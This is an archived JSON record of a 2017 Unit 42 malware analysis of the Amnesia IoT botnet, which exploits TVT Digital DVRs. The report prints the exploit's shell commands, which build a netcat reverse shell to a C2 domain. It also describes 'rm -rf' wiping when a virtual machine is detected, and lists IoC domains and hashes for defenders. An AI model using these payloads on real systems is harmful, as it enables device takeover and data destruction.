{
	"id": "c11562a2-8c85-43b2-bd3f-f1b9d41c9c6a",
	"created_at": "2026-04-06T00:14:16.434129Z",
	"updated_at": "2026-04-10T03:24:18.216448Z",
	"deleted_at": null,
	"sha1_hash": "baf7a6d0f4ee7a8072ea96f969be220722b0ea7b",
	"title": "New IoT/Linux Malware Targets DVRs, Forms Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 712993,
	"plain_text": "New IoT/Linux Malware Targets DVRs, Forms Botnet\r\nBy Claud Xiao, Cong Zheng\r\nPublished: 2017-04-06 · Archived: 2026-04-05 17:50:43 UTC\r\nUnit 42 researchers have identified a new variant of the IoT/Linux botnet “Tsunami”, which we are calling\r\n“Amnesia”. The Amnesia botnet targets an unpatched remote code execution vulnerability that was publicly\r\ndisclosed over a year ago in March 2016 in DVR (digital video recorder) devices made by TVT Digital and\r\nbranded by over 70 vendors worldwide (a listing of which can be found on the original vulnerability report we've\r\nlinked to). Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000\r\ndevices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed.\r\nFigure 1  Distribution of Vulnerable TVT Digital's DVR devices\r\nIn addition, we believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion\r\ntechniques to defeat malware analysis sandboxes. Virtual machine evasion techniques are more commonly\r\nassociated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect\r\nwhether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those\r\nenvironments it will wipe the virtualized Linux system by deleting all the files in file system. This affects not only\r\nLinux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.\r\nAmnesia exploits this remote code execution vulnerability by scanning for, locating, and attacking vulnerable\r\nsystems. A successful attack results in Amnesia gaining full control of the device.  Attackers could potentially\r\nharness the Amnesia botnet to launch broad DDoS attacks similar to the Mirai botnet attacks we saw in Fall 2016.\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 1 of 9\n\nEven though this vulnerability was disclosed over a year ago, despite our best efforts, we have been unable to find\r\nupdates that fix this vulnerability.\r\nWhile the Amnesia botnet hasn’t yet been used to mount large scale attacks, the Mirai botnet attacks show the\r\npotential harm large-scale IoT-based botnets can cause. Palo Alto Networks recommends all customers ensure\r\nthey have our latest protections in place. Additionally, everyone should block traffic to Amnesia’s command and\r\ncontrol servers (C2s) listed in Indicators of Compromise (IoC) section of this blog should do so.\r\nTechnical Details\r\nVulnerability Details\r\nOn March 22, 2016, security researcher Rotem Kerner disclosed the vulnerability to the public. According to his\r\nblog, over 70 DVR vendors around the world were affected by the vulnerability. However, all the DVR devices\r\nwere manufactured by the same company, “TVT Digital”. To date, we have been unable to find any patch released\r\nby the vendors or the manufacturer to address the vulnerability.\r\nAdditionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on\r\nInternet that are likely produced by TVT Digital. We also searched the keyword on Shodan.io and on Censys.io.\r\nThey reported about 50,000 and about 705,000 IP addresses respectively.\r\nTable 1 shows the top 20 Countries for potentially vulnerable TVT Digital DVR devices:\r\n1. Taiwan 47170\r\n2. United States 44179\r\n3. Israel 23355\r\n4. Turkey 11780\r\n5. India 9796\r\n6. Malaysia 9178\r\n7. Mexico 7868\r\n8. Italy 7439\r\n9. Vietnam 6736\r\n10. United Kingdom 4402\r\n11. Russia 3571\r\n12. Hungary 3529\r\n13. France 3165\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 2 of 9\n\n14. Bulgaria 3040\r\n15. Romania 2783\r\n16. Colombia 2616\r\n17. Egypt 2541\r\n18. Canada 2491\r\n19. Iran 1965\r\n20. Argentina 1748\r\nTable 1 Top 20 Countries for potentially vulnerable TVT DVR Digital Devices\r\nPropagation and Vulnerability Exploitation\r\nAmnesia communicates with its C2 server using the IRC protocol. Figure 2 shows some commands it was\r\ndesigned to receive, including to launch DDoS attacks by different types of HTTP flooding and UDP flooding.\r\nFigure 2  C2 Commands of Amnesia\r\nIn addition to these commands, two more commands were implemented: CCTVSCANNER and CCTVPROCS.\r\nThese commands are used for scanning and exploiting the RCE vulnerability in TVT Digital DVRs. After\r\nreceiving the commands, Amnesia will firstly make a simple HTTP request to the IP address included with the\r\ncommand, checking whether the target is a vulnerable DVR device. This is done by searching for a special string\r\n“Cross Web Server” in the HTTP response content as shown in Figure 3 since the TVT Digital’s DVRs used this\r\nstring as server name in HTTP header.\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 3 of 9\n\nFigure 3  Check whether the target is a vulnerable DVR\r\nIf a vulnerable DVR is found, Amnesia will send four more HTTP requests which contains exploit payloads of\r\nfour different shell commands. The commands are:\r\necho \"nc\" \u003e f\r\necho \"{one_of_c2_domains}\" \u003e\u003e f\r\necho \"8888 –e $SHELL\" \u003e\u003e f\r\n$(cat f) \u0026 \u003e r\r\nThese commands create a shell script file and execute it. The script content connects with one of Amnesia C2\r\nservers and to expose system default shell. Therefore, the infected devices will be compromised and will listen\r\nfurther shell commands sent from C2 servers as shown in Figure 4\r\nFigure 4  Exploit the RCE vulnerability\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 4 of 9\n\nAnti-Forensics\r\nWhen an Amnesia sample executes, it will immediately check whether it’s running in a virtual machine by reading\r\nfiles /sys/class/dmi/id/product_name and /sys/class/dmi/id/sys_vendor and comparing the file contents with\r\nkeywords “VirtualBox”, “VMware” and “QEMU” as shown in Figure 5. These two files are used by Linux DMI\r\n(Desktop Management Interface) to store hardware’s product and manufacturer information. These strings being\r\nincluded in the DMI files implies that the Linux system is running in a virtual machine based on VirtualBox,\r\nVMware or QEMU, respectively.\r\nFigure 5  Inspects DMI files to detect VM\r\nIf a virtual machine was detected, Amnesia will delete itself, and then try to delete all of the following directories:\r\n1. the Linux root directory “/”,\r\n2. the current user’s home directory “~/”, and\r\n3. the current working directory “./”\r\nThese delete operations are basically equivalent to wiping the whole Linux system. They were implemented by\r\nsimply executing shell command “rm -rf” as shown in Figure 6. For each directory, “rm” command will be\r\nexecuted twice – one in the background, and one in the foreground. Hence, the deleting of the three directories\r\nwill be parallel. Finally, Amnesia will wait for the delete to finish.\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 5 of 9\n\nFigure 6  Wipe the Linux system\r\nWe believe the author of Amnesia was aiming to defeat Linux-based malware analysis sandboxes and to cause\r\ntrouble for security researchers due to a hard-coded but otherwise useless string in the code: “fxxkwhitehats”.\r\nHowever, VM based sandboxes typically have system snapshot enabled, allowing for quick recovery to the\r\noriginal state (the sample’s analysis task may be ruined though). The impact will be limited in these cases. The\r\nreal problem is, if the malware infected some QEMU based Linux server instances, such as virtual hosts provided\r\nby VPS vendors, the Linux server will also be wiped, which could be catastrophic if back-ups are not available.\r\nAfter the VM check, Amnesia creates persistence files in /etc/init.d/.rebootime and /etc/cron.daily/.reboottime, or\r\nin ~/.bashrc and ~/.bash_history, depending on the current user’s privileges. It then kills all Telnet and SSH related\r\nprocesses, and connects with a C2 server to receive further commands.\r\nAmnesia hard-coded three domain names such as “irc.freenode.net” as decoy C2 server addresses. However, the\r\nreal C2 configuration is decrypted during runtime by simple Caesar cipher algorithm. It chooses one of these three\r\nservers:\r\nukranianhorseriding[.]net\r\nsurrealzxc.co[.]za\r\ninversefierceapplied[.]pw\r\nAll three of these domains have resolved to the same IP address 93.174.95[.]38 since December 1st, 2016. Before\r\nthat, the IP address was also used to host other IoT/Linux malware such as DropPerl.\r\nConclusion\r\nBesides the threat that the Amnesia botnet presents, the malware reveals some interesting and notable trends of\r\ncurrent IoT/Linux botnet threats:\r\nIoT/Linux malware has begun to adopt classic techniques to evade and even wipe virtual machines.\r\nIoT/Linux malware targets and attacks known remote code execution vulnerabilities in IoT devices. These\r\nare typically manufactured by smaller manufacturers and there may be no patch available.\r\nIoT/Linux malware may also affect Linux servers deployed in VPS or in public cloud.\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 6 of 9\n\nIn the case of Amnesia, because the malware relies on hard coded C2 addresses, preventing another Mirai-type\r\nattack is possible if these addresses are blocked as broadly as possible as quickly as possible.\r\nUpdate: After publishing this report, we learned of other researchers’ past work on various aspects of this\r\nmalware.\r\nAs we mentioned in the introduction, the Tsunami bot has a long history, and this latest version incorporated new\r\nfeatures, including a scanner to identify and exploit DVRs for CCTV systems as well as Anti-VM detection\r\ncapabilities. The CCTV scanning and exploitation technique was previously discussed in these two reports.\r\n8ack - Big Brother is attacking you\r\nCyberX – Radiation Report\r\nResearcher Michal Malik also noted this malware had VM detection capabilities in a Tweet in January:\r\nhttps://twitter.com/michalmalik/status/818182119285473282\r\nProtections\r\nPalo Alto Networks has blocked the Domains used by this malware for command and control through PAN-DB\r\nand Threat Prevention.\r\nIndicators of Compromise\r\nC2 Domains and IP addresses\r\nukranianhorseriding[.]net\r\nsurrealzxc.co[.]za\r\ninversefierceapplied[.]pw\r\n93.174.95[.]38\r\nAmnesia Sample SHA-256\r\n06d30ba7c96dcaa87ac584c59748708205e813a4dffa7568c1befa52ae5f0374\r\n10aa7b3863f34d340f960b89e64319186b6ffb5d2f86bf0da3f05e7dbc5d9653\r\n175fe89bbc8e44d45f4d86e0d96288e1e868524efa260ff07cb63194d04ea575\r\n1d8bc81acbba0fc56605f60f5a47743491d48dab43b97a40d4a7f6c21caca12a\r\n2f9cd1d07c535aae41d5eed1f8851855b95b5b38fb6fe139b5f1ce43ed22df22\r\n327f24121d25ca818cf8414c1cc704c3004ae63a65a9128e283d64be03cdd42e\r\n37b2b33a8e344efcaca0abe56c6163ae64026ccef65278b232a9170ada1972af\r\n3a595e7cc8e32071781e36bbbb680d8578ea307404ec07e3a78a030574da8f96\r\n4313af898c5e15a68616f8c40e8c7408f39e0996a9e4cc3e22e27e7aeb2f8d54\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 7 of 9\n\n46ea20e3cf34d1d4cdfd797632c47396d9bdc568a75d550d208b91caa7d43a9b\r\n4b0feb1dd459ade96297b361c69690ff69e97ca6ee5710c3dc6a030261ba69e0\r\n4db9924decd3e578a6b7ed7476e499f8ed792202499b360204d6f5b807f881b8\r\n5e6896b39c57d9609dc1285929b746b06e070886809692a4ac37f9e1b53b250c\r\n64f03fff3ed6206337332a05ab9a84282f85a105432a3792e20711b920124707\r\n6b2885a4f8c9d84e5dc49830abf7b1edbf1b458d8b9d2bafb680370106f93bc3\r\n6b29b65c3886b6734df788cfc6628fbee4ce8921e3c0e8fc017e4dea2da0fd0b\r\n885dce73237c4d7b4d481460baffbd5694ab671197e8c285d53b551f893d6c09\r\n886136558ec806da5e70369ee22631bfb7fa06c27d16c987b6f6680423bc84b0\r\n8f57ec9dfba8cf181a723a6ac2f5a7f50b4550dd33a34637cf0f302c43fd0243\r\n9351ee0364bdbb5b2ff7825699e1b1ee319b600ea0726fd9bb56d0bd6c6670cb\r\n9c7a5239601a361b67b1aa3f19b462fd894402846f635550a1d63bee75eab0a2\r\na010bf82e2c32cba896e04ec8dbff58e32eee9391f6986ab22c612165dad36a0\r\nad65c9937a376d9a53168e197d142eb27f04409432c387920c2ecfd7a0b941c8\r\naeb480cf01696b7563580b77605558f9474c34d323b05e5e47bf43ff16b67d6a\r\nb113ec41cc2fd9be9ac712410b9fd3854d7d5ad2dcaac33af2701102382d5815\r\nb13014435108b34bb7cbcef75c4ef00429b440a2adf22976c31a1645af531252\r\nb3d0d0e2144bd1ddd27843ef65a2fce382f6d590a8fee286fda49f8074711545\r\nbdefa773e3f09cdc409f03a09a3982f917a0cc656b306f0ece3dd1a2564a8772\r\nc03b403d5de9778a2ec5949d869281f13976c2fc5b071e0f5f54277680c80902\r\ncb2382b818993ef6b8c738618cc74a39ecab243302e13fdddb02943d5ba79483\r\nce61dcfc3419ddef25e61b6d30da643a1213aa725d579221f7c2edef40ca2db3\r\nd0bda184dfa31018fe999dfd9e1f99ca0ef502296c2cccf454dde30e5d3a9df9\r\ne7d6b3e1fba8cdf2f490031e8eb24cd515a30808cdd4aa15c2a41aa0016f8082\r\neb54dc959b3cc03fbd285cef9300c3cd2b7fe86b4adeb5ca7b098f90abb55b8a\r\nf23fecbb7386a2aa096819d857a48b853095a86c011d454da1fb8e862f2b4583\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 8 of 9\n\nf6af2fa4f987df773d37d9bb44841a720817ce3817dbf1e983650b5af9295a16\r\nf7a737cb73802d54f7758afe4f9d0a7d2ea7fda4240904c0a79abae732605729\r\nf7cf1e0d7756d1874630d0d697c3b0f3df0632500cff1845b6308b11059deb07\r\nf97848514b63e9d655a5d554e62f9e102eb477c5767638eeec9efd5c6ad443d8\r\nIgnite ’17 Security Conference: Vancouver, BC June 12–15, 2017\r\nIgnite ’17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear\r\nfrom innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find\r\nout how breach prevention is changing the security industry. Visit the Ignite website for more information on\r\ntracks, workshops and marquee sessions.\r\nSource: http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"
	],
	"report_names": [
		"unit42-new-iotlinux-malware-targets-dvrs-forms-botnet"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434456,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/baf7a6d0f4ee7a8072ea96f969be220722b0ea7b.pdf",
		"text": "https://archive.orkl.eu/baf7a6d0f4ee7a8072ea96f969be220722b0ea7b.txt",
		"img": "https://archive.orkl.eu/baf7a6d0f4ee7a8072ea96f969be220722b0ea7b.jpg"
	}
}